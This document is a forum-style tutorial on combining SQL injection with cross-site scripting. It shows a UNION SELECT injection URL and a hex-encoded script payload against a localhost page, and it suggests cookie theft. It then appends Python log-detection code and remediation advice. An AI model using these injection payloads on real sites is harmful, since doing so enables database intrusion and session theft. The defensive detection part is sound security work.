XSSQLI Tutorial [XSS through SQLI]
Today I went looking for SQLi tutorials in this forum, but only found "Union Select Statement", "Easy Injection" and "Noob Injection". So now I will explain how to perform XSS via SQL injection (XSSQLi). What do you think we can do when we have a SQLi vulnerability, and what more can we do with it? "I always look for the admin table and the admin page."
Sometimes we can inject with SQLi, but the site doesn't have a login page. So what will you do with this SQLi-vulnerable site? (Skip it, or move on to the next one?) Don't skip it; let's bypass some filters or steal cookies with XSS.
Let's Start
1. First of all, you will need a target which is vulnerable to SQL injection. Let's follow my target:
localhost/groupinfo.php?show=2
2. Now we have to find the number of columns and build a UNION statement. I assume you already know SQLi well, so let me skip the details.
localhost/groupinfo.php?show=null UNION SELECT 1,2,3,4,5,6--
3. After you have found the vulnerable column, you need to add the XSS payload to the UNION statement, like this:
XSS Payload:
<script>alert("Hello HC")</script>
Hex Encoded Payload:
localhost/groupinfo.php?show=null UNION SELECT 1,0x3c7363726970743e616c657274282248656c6c6f20484322293c2f7363726970743e,3,4,5,6--
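* Remember: encode your payload into hex and prefix it with 0x.
So, press Enter. We get an alert box: the page prints the value of the injected column into its HTML without escaping it, so the browser runs the decoded script.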
![[Image: Snap134.png]](http://s12.postimg.org/q0q9izifx/Snap134.png)
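From the defender's side, the hex-encoded request in step 3 can be flagged in web server logs by decoding every 0x literal in the query string and checking whether it turns into HTML markup. This is an added example, not part of the original post; the name inspect_request, the regexes and the sample requests (apart from the payload URL from step 3) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# MySQL treats 0x<hex digits> as a string literal in string context,
# so keyword and "<script" filters never see the markup in clear text.
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2}){4,})")
# An opening or closing HTML tag such as <script> or </div>.
MARKUP = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*[\s/>]", re.I)
UNION_SELECT = re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S)


def inspect_request(url):
    """Return a list of findings for one request URL (empty list = clean)."""
    query = unquote_plus(urlsplit(url).query)
    findings = []
    if UNION_SELECT.search(query):
        findings.append("union-select in query string")
    for match in HEX_LITERAL.finditer(query):
        # latin-1 maps every byte to one character, so decoding never fails.
        decoded = bytes.fromhex(match.group(1)).decode("latin-1")
        if MARKUP.search(decoded):
            findings.append("hex literal decodes to markup: " + decoded)
    if MARKUP.search(query):
        findings.append("raw markup in query string")
    return findings


# Hex value copied from step 3 of the post.
PAGE_HEX = "3c7363726970743e616c657274282248656c6c6f20484322293c2f7363726970743e"

# Constructed sample requests: a normal one, the one from step 3
# (URL-encoded as a browser would send it), and a benign hex value.
SAMPLES = [
    "http://localhost/groupinfo.php?show=2",
    "http://localhost/groupinfo.php?show=null%20UNION%20SELECT%201,0x"
    + PAGE_HEX + ",3,4,5,6--",
    "http://localhost/groupinfo.php?color=0xffcc0011",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(url[:60], "->", inspect_request(url) or "clean")
```

Detection like this is only for triage; the underlying fix is to bind show as a query parameter and to HTML-escape every database value before it is printed into the page.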